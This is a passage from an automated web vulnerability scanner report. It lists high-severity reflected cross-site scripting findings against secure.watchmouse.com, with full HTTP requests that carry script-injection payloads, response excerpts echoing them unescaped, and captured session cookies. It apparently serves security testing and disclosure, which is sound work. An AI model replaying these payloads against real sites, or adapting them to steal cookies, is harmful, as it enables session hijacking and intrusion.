Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f7251e205b301e3491bd7753dc256dd0"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/fancybox.jsfd971"><script>alert(1)</script>53f2257d48d" method="post">
...[SNIP]...

1.195. https://secure.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313c8"><script>alert(1)</script>ff7eaacae42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets313c8"><script>alert(1)</script>ff7eaacae42/js/jquery-1.3.2.min.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:18 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b40cdb40ab6535f3ef041224963103c5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets313c8"><script>alert(1)</script>ff7eaacae42/js/jquery-1.3.2.min.js" method="post">
...[SNIP]...

1.196. https://secure.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59063"><script>alert(1)</script>fdb94fdc602 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js59063"><script>alert(1)</script>fdb94fdc602/jquery-1.3.2.min.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-41c72bf9e01909c71fe5365ded9c0b55"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js59063"><script>alert(1)</script>fdb94fdc602/jquery-1.3.2.min.js" method="post">
...[SNIP]...

1.197. https://secure.watchmouse.com/assets/js/jquery-1.3.2.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 401bf"><script>alert(1)</script>ca85781f7bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/jquery-1.3.2.min.js401bf"><script>alert(1)</script>ca85781f7bb HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:24 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b57dd52645d220519f177be27d13b328"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/jquery-1.3.2.min.js401bf"><script>alert(1)</script>ca85781f7bb" method="post">
...[SNIP]...

1.198. https://secure.watchmouse.com/assets/js/wm.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 569aa"><script>alert(1)</script>3d0abf01272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets569aa"><script>alert(1)</script>3d0abf01272/js/wm.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e96f6ee5565a21c690aacc16df97fe0f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets569aa"><script>alert(1)</script>3d0abf01272/js/wm.js" method="post">
...[SNIP]...

1.199. https://secure.watchmouse.com/assets/js/wm.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ba"><script>alert(1)</script>7ea63d2b988 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js794ba"><script>alert(1)</script>7ea63d2b988/wm.js HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b3a9c8061b6d52915f7b6ab000ababde"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js794ba"><script>alert(1)</script>7ea63d2b988/wm.js" method="post">
...[SNIP]...

1.200. https://secure.watchmouse.com/assets/js/wm.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/js/wm.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 957fb"><script>alert(1)</script>d7321fa6cfc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/js/wm.js957fb"><script>alert(1)</script>d7321fa6cfc HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-d23e4a757418e0656328295e25750a78"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/js/wm.js957fb"><script>alert(1)</script>d7321fa6cfc" method="post">
...[SNIP]...

1.201. https://secure.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9c8"><script>alert(1)</script>21a00d42841 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie5b9c8"><script>alert(1)</script>21a00d42841 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:35 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-f3b63b44c114816c7e7ae76f4e8e81d8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie5b9c8"><script>alert(1)</script>21a00d42841" method="post">
...[SNIP]...

1.202. https://secure.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e69a'-alert(1)-'7d2c4d52679 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie6e69a'-alert(1)-'7d2c4d52679 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-edd0f2fcb3230f026d41ba9ee307cfa9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?3d071%22%3E%3Cscript%3Ealert(document.cookie6e69a'-alert(1)-'7d2c4d52679');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

1.203. https://secure.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c356"><script>alert(1)</script>f5dc871f42d was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=19c356"><script>alert(1)</script>f5dc871f42d HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:35 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-c86580fcde56eabcbff98332c59e3c5a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=19c356"><script>alert(1)</script>f5dc871f42d" method="post">
...[SNIP]...

1.204. https://secure.watchmouse.com/en/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3538f'-alert(1)-'680cbdac783 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=13538f'-alert(1)-'680cbdac783 HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:26:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-9269ea0feae78f4cbfcf18a3e0f821cd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::script%3E03249d204b0=13538f'-alert(1)-'680cbdac783');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

1.205. https://secure.watchmouse.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c75f1"><script>alert(1)</script>b3ba854ebba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enc75f1"><script>alert(1)</script>b3ba854ebba/ HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:38 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-a679bd02c702e1823560cdfc691d4b44"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enc75f1"><script>alert(1)</script>b3ba854ebba/" method="post">
...[SNIP]...

1.206. https://secure.watchmouse.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c75ba'-alert(1)-'dcf0f1ccf69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enc75ba'-alert(1)-'dcf0f1ccf69/ HTTP/1.1
Host: secure.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:26:40 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-c74a2bac85ccc1281e2551f1e0496d92"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::enc75ba'-alert(1)-'dcf0f1ccf69');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

1.207. https://secure.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /en/

Issue detail

